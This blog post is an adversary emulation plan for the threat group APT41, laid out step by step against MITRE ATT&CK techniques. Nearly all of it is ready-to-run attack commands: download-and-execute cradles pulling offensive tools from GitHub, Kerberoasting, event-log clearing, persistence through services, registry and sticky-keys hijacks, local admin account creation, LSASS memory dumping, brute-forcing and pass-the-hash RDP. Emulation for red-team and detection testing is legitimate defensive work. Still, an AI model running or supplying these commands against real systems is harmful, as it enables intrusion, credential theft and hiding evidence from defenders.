The reason behind this blog post is mainly due to the fact, that I got inspired by MITRE Engenuity Center for Threat-Informed Defense (Center) for releasing their emulation plan of FIN6. This emulation plan can be found here
The set-up and layout of this blog post is inspired by MITRE Engenuity Center for Threat-Informed Defense (Center), so credits to them for providing such a great set-up.
APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.
US says APT41 orchestrated intrusions at more than 100 companies across the world, ranging from software vendors, video gaming companies, telcos, and more.
This emulation plan is based on public information that is available. Everything is provided in such a way that everyone is capable enough to execute it. All the information around the used techniques are coming from MITRE ATT&CK.
Keep in mind that it’s difficult to know exactly which steps were taken, so yes. I don’t claim that it’s the exact way on how the adversaries operate.
Step 1 – APT41 Initial Access
Usually they start with sending spear-phishing mails to their victims with an attachment, such as a compiled HTML file (.chm)
Step 2 – Discovery
Once the group has managed to obtain a foothold on a compromised machine. They are starting to use built-in Windows functionalities to perform reconnaissance to gather information about system & network configurations.
Get username from victim machine
Get MAC address from victim machine
2.3 – System Network Connections Discovery (T1049)
List network connections to or from compromised system
# Shows all TCP connections with no DNS resolution (show IP addresses instead). netstat -ant # Displays the contents of the IP routing table. (This is equivalent to the route print command under Windows.) netstat -r
2.4 – System Network Connections Discovery (T1049)
Enumerate active RDP sessions on local & remote host.
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/Po werView.ps1 -OutFile C:\Temp\PowerView.ps1 cd C:\Temp Import-Module .\PowerView.ps1 # Return all active RDP sessions on localhost Get-NetRDPSession # Return all active RDP sessions on Domain Controllers Get-DomainController | Get-NetRDPSession # Return all active RDP session on a remote server Get-NetRDPSession -ComputerName "remoteserver"
2.5 – Network Share Discovery (T1135)
List shares on local & remote host.
# List all shares on local host net share # List all shares on remote host net view \\remotesystem
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/Po werView.ps1 -OutFile C:\Temp\PowerView.ps1 cd C:\Temp Import-Module .\PowerView.ps1 # Return active shares on local host Get-NetShare # Return active shares on remote host Get-NetShare -ComputerName remoteserver # Return all shares for every domain joined computer Get-DomainComputer | Get-NetShare
2.6 – Network Service Scanning (T1046)
List all subnets in AD
# Use LDAP search filter to enumerate all subnets in AD $ChildItems = ([ADSI]"LDAP://CN=Subnets,CN=Sites,CN=Configuration,DC=contoso,DC=com"); $ChildItems.psbase.Children | Format-Table name, Description, whenCreated # Using .NET classes to enumerate all subnets in AD [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets
2.7 – Domain Trust Discovery (T1482)
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.
nltest /domain_trusts > ad_trustdmp.txt
2.8 – Permission Groups Discovery: Domain Groups (T1069.002)
APT41 used the net.exe utility to enumerate the Domain Admins group.
net group "Domain Admins" /do
Step 3 – Execution
In this step, the adversaries are downloading and executing malware on the victim machine.
3.1 – Command and Scripting Interpreter: PowerShell (T1059.001)
FireEye has covered in their blog post that APT41 leveraged to PowerShell in order to download and execute their malware.
Not the exact way, like APT41 did. But here is a similar way.
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
3.2 – Windows Management Instrumentation (T1047)
APT41 used the WMIEXEC utility to execute whoami commands on remote machines.
Invoke-WebRequest https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1 - OutFile C:\Temp\WmiExec.ps1 cd C:\Temp .\WmiExec.ps1 -ComputerName remotesystem -Command "whoami"
Step 4 – Defense Evasion
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.
4.1 – BITS Jobs (T1197)
Leveraging the Microsoft BITSAdmin command-line tool to download and install payloads
bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1
# PowerShell version powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1
4.2 – Indirect Command Execution (T1202)
APT41 used certutil to download additional files.
certutil -urlcache -split -f https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1 C:\Temp\SharpHound.ps1
4.3 – Indicator Removal on Host: Clear Windows Event Logs (T1070.001)
APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.
# Run CMD as admin wevtutil cl security wevtutil cl system
4.4 – Indicator Removal on Host: Clear Command History (T1070.003)
APT41 attempted to remove evidence of some of its activity by deleting Bash histories. (Linux related)
Step 5 – Persistence
Persistence consists of techniques that adversaries use to keep access to a victim system.
5.1 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "StorSyncSvc" /t REG_MULTI_SZ /d "StorSyncSvc" /f
5.2 – Create or Modify System Process: Windows Service (T1543.003)
APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.
sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k "StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"
# PowerShell version New-Service -BinaryPathName C:\Windows\System32\cmd.exe -Name APT41 -DisplayName APT41 -StartupType Automatic
5.3 – Scheduled Task/Job: Scheduled Task (T1053.005)
APT41 used a compromised account to create a scheduled task on a system.
schtasks /create /tn "NotAVirus" /tr C:\Windows\System32\calc.exe /sc minute /mo 1
5.4 – Event Triggered Execution: Accessibility Features (T1546.008)
APT41 leveraged sticky keys to establish persistence.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
5.5 – Create Account: Local Account (T1136.001)
APT41 created user accounts and adds them to the User and Admin groups.
# Create local account net user APT41 MyCrappyPassw0rd! /add # Add local account to the Built-in Administrators group net localgroup Administrators APT41 /add
5.6 – Windows Management Instrumentation (T1047)
APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence
# Run PowerShell as admin Invoke-WebRequest https://raw.githubusercontent.com/subesp0x10/Wmi-Persistence/master/WMI-Pe rsistence.ps1 -OutFile C:\Temp\WMI-Persistence.ps1 cd C:\Temp Import-Module .\WMI-Persistence.ps1 Install-Persistence -Trigger Startup -Payload "c:\windows\system32\calc.exe"
6 – Credential Access
Credential Access consists of techniques for stealing credentials like account names and passwords
6.1 – OS Credential Dumping: LSASS Memory (T1003.001)
Dumping password hashes from memory
# Run PowerShell as admin Get-Process lsass .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 752 C:\temp\lsass.dmp full
6.2 – Brute Force: Password Cracking (T1110.002)
APT41 performed password brute-force attacks on the local admin (RID-500) account.
Invoke-WebRequest https://raw.githubusercontent.com/samratashok/nishang/master/Scan/Invoke-B ruteForce.ps1 -OutFile C:\Temp\Invoke-BruteForce.ps1 cd C:\Temp Import-Module .\Invoke-BruteForce.ps1 Invoke-BruteForce -ComputerName victimmachine -UserList C:\Temp\users.txt -PasswordList C:\Temp\wordlist.txt -Service LocalAccounts -StopOnSuccess -Verbose
7 – Lateral Movement
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.
7.1 – Remote Services: Remote Desktop Protocol (T1021.001)
APT41 used RDP for lateral movement.
In order to perform such attack. It’s possible to use the xfreeRDP. This is a Linux built-in Linux utility.
This only works on:
- Windows Server 2012 R2
- Windows 8.1
Restricted Admin Mode also needs to be enabled on the target systems, but it’s nothing more than a registry key flip.
xfreerdp /u:admin /d:. /pth:hash:hash /v:TARGET